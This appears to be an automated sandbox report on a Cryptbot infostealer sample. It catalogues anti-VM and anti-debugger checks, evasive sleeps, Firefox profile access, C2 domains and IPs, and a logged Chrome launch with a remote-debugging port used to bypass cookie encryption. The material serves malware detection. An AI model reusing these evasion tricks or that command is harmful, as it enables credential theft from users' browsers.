Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1364A45 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1512AAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1519B9C instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2529 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2495 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2339 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 878 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 4052 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2024 Thread sleep time: -5060529s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6596 Thread sleep time: -4992495s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5392 Thread sleep time: -210105s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2680 Thread sleep time: -240120s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2024 Thread sleep time: -4680339s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6596 Thread sleep time: -1756878s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.4589002200.00000000014EF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 00000004.00000002.4611227117.000055A802D20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: chrome.exe, 00000004.00000002.4608858476.000055A8028AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 00000004.00000002.4611006859.000055A802CBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ec6f7c13-9ec0-49da-a2b6-4b2380b53675U
Source: chrome.exe, 00000004.00000002.4611006859.000055A802CBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ec6f7c13-9ec0-49da-a2b6-4b2380b53675
Source: chrome.exe, 00000004.00000002.4611006859.000055A802CBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ec6f7c13-9ec0-49da-a2b6-4b2380b53675
Source: chrome.exe, 00000004.00000003.3809324638.000055A804004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4617713629.000055A804204000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
Source: file.exe Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000004.00000002.4595394967.000002171467C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: chrome.exe, 00000004.00000002.4611006859.000055A802CBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ec6f7c13-9ec0-49da-a2b6-4b2380b53675U
Source: file.exe, 00000000.00000002.4589002200.00000000014EF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2899041838.000000000078B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4586274954.0000000000756000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2853256591.0000000000789000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2893587451.000000000078C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.4589002200.00000000014EF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: LProgram Manager
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2827080258.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1864, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2827080258.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1864, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562596 Sample: file.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 6 other signatures 2->39 7 file.exe 1 2->7         started        process3 dnsIp4 17 fvtekk5pn.top 34.116.198.130, 49707, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->17 19 127.0.0.1 unknown unknown 7->19 21 home.fvtekk5pn.top 7->21 41 Detected unpacking (changes PE section rights) 7->41 43 Attempt to bypass Chrome Application-Bound Encryption 7->43 45 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->45 47 5 other signatures 7->47 11 chrome.exe 1 7->11         started        signatures5 process6 dnsIp7 23 192.168.2.6, 443, 49702, 49705 unknown unknown 11->23 25 239.255.255.250 unknown Reserved 11->25 14 chrome.exe 11->14         started        process8 dnsIp9 27 plus.l.google.com 172.217.17.78 GOOGLEUS United States 14->27 29 play.google.com 172.217.19.206 GOOGLEUS United States 14->29 31 2 other IPs or domains 14->31
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.19.206
 play.google.com United States
15169 GOOGLEUS false
172.217.17.78
 plus.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
172.217.21.36
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.6
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
plus.l.google.com 172.217.17.78 true
play.google.com 172.217.19.206 true
www.google.com 172.217.21.36 true
fvtekk5pn.top 34.116.198.130 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
Efvtekk5pn.top true
  • Avira URL Cloud: safe
 unknown
kk5pfvtekk5pn.top true
  • Avira URL Cloud: safe
 unknown
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high
    analforeverlovyu.top false
      		high